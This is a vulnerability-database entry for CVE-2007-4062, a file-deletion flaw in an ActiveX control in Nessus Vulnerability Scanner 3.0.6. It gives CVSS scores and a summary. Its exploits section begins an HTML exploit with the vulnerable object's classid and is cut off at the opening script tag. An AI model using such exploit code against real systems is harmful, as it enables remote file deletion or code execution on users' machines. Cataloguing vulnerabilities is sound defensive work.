7.8
CVSSv2

CVE-2007-4062

Published: 30/07/2007 Updated: 29/07/2017
CVSS v2 Base Score: 7.8 | Impact Score: 7.8 | Exploitability Score: 8.6
VMScore: 785
Vector: AV:N/AC:M/Au:N/C:N/I:P/A:C

Vulnerability Summary

The SCANCTRL.ScanCtrlCtrl.1 ActiveX control in scan.dll in Nessus Vulnerability Scanner 3.0.6 allows remote malicious users to delete arbitrary files via unspecified vectors involving the deleteNessusRC method, probably a directory traversal vulnerability.

Vulnerable Product Search on Vulmon Subscribe to Product

nessus vulnerability scanner 3.0.6

Exploits

<HTML> <!-- Nessus Vulnerability Scanner 306 ActiveX 0day Remote Code Execution Exploit Bug discovered by Krystian Kloskowski (h07) <h07@interiapl> Tested on Nessus 306 / IE 6 / XP SP2 Polish Just for fun ;] --> <object id="obj" classid="clsid:A47D5315-321D-4DEE-9DB3-18438023193B"></object> <script language=" ...